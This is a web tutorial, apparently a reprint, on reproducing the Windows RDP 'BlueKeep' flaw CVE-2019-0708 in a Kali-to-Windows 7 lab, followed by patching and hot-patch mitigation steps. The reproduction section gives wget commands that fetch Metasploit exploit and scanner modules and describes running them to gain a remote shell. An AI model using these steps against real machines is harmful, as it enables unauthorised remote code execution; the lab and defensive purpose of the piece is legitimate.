Windows CVE-2019-0708 Remote Desktop Code Execution Vulnerability Reproduction Issue

1. Vulnerability Description

On May 15, 2019, Microsoft released a security patch to fix the Windows Remote Desktop Service (RDP) remote code execution vulnerability with CVE number CVE-2019-0708. This vulnerability can be triggered remotely without identity authentication, and the harm and impact are extremely large.

At present, on September 7, the EXP code has been publicly released to the Pull requests of metasploit-framework , and it has been tested that remote code execution can be achieved.

2. Vulnerability Affected Versions

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Note: Windows 8 and Windows 10 and later versions are not affected by this vulnerability

3. Vulnerability Environment Construction

Attack aircraft: kali 2018.2

Target machine: win7 sp1 7061

4. Vulnerability Reproduction

1. Update msf

apt-get update

apt-get install metasploit-framework

2. Download the attack kit

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

3. Replace the corresponding files in msf

cve_2019_0708_bluekeep_rce.rb Add /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb replaces /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb replaces /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb replaces /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

4. Start msf and load the file

5. Search for 0708 and you can see that the file is loaded successfully.

6. Exploit the vulnerability, set rhosts, target, and payload

7. Start executing exp and successfully get the shell

Vulnerability Prevention

1. Download the hot patch repair tool, download address: https://www.qianxin.com/other/CVE-2019-0708

Note: The "CVE-2019-0708 Hot Patch Tool" is a hot patch repair tool launched for the "Windows Remote Desktop Service Remote Code Execution Vulnerability CVE-2019-0708". It can provide a temporary solution to the vulnerability problem in an environment that cannot be directly patched.

 Download the file and unzip it.
2. Use the win+R shortcut key or select "Run" from the Start menu and enter cmd. Invoke the command line tool.
3. In the command line tool, execute the command to the folder where the tool is located. 4. Enter the command corresponding to the function, enable the hot patch command: QKShield.exe /enable; disable the hot patch command: QKShield.exe/disable.
5. After restarting the system, you need to re-run the command line to enable the hot patch

2. Enable hot patching

3. Check again whether there is a vulnerability. You can see that after the hot patch is applied, there is no vulnerability.

4. Patching, vulnerability repair tool download, download address: https://www.qianxin.com/other/CVE-2019-0708

5. Click "Repair Now" and restart your computer after the installation is complete.

6. Use vulnerability scanning tools to detect whether there are vulnerabilities. Scanning tool download address: https://www.qianxin.com/other/CVE-2019-0708

Summarize

The above is the Windows CVE-2019-0708 Remote Desktop Code Execution Vulnerability Reproduction Issue introduced by the editor. I hope it will be helpful to everyone. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website!
If you find this article helpful, please feel free to reprint it and please indicate the source. Thank you!